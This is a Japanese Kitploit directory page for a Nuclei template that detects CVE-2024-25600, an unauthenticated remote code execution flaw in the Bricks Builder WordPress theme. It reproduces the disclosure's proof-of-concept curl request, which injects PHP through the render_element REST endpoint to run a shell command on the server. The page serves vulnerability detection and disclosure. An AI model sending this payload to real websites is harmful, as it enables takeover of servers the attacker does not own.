Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25600_Nuclei-Template — CVE-2024-25600 の PoC に関する Nuclei テンプレートと情報 | Kitploit
ツール/GitHubGitHub/christbowel/cve-2024-25600_nuclei-template
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubchristbowel/cve-2024-25600_nuclei-template

CVE-2024-25600_Nuclei-Template

CVE-2024-25600 の PoC に関する Nuclei テンプレートと情報

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
3172年前Kitploit レビュー済み

CVE-2024-25600_Nuclei-Template

CVE-2024-25600 に関する Nuclei テンプレートと PoC の情報

説明 📝

WordPress 用の Bricks テーマは、バージョン 1.9.6 までのすべてのバージョンにおいてリモートコード実行の脆弱性があります。これにより、認証されていない攻撃者がサーバー上でコードを実行できる可能性があります。 このテンプレート 🛠️ は、nuclei を使用して WordPress 用 Bricks Builder プラグインに見つかった CVE-2024-25600 の脆弱性 🕳️ を検出するように設計されています。この脆弱性により、影響を受けるウェブサイト 💻 で認証されていないリモートコード実行が可能になります。

概念実証 (PoC) 📝

完全な PoC (自動) は https://github.com/chocapikk/CVE-2024-25600 で入手できます。

開示によって提供された基本 PoC は以下の通りです。

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}'

[HOST] をターゲットのウェブサイトに、[NONCE] をサイトから取得した nonce 値に置き換えてください。

参考文献 📖

CVE-2024-25600 の脆弱性の詳細については、Snicco.io の詳細な開示を参照してください。

ツールをダウンロード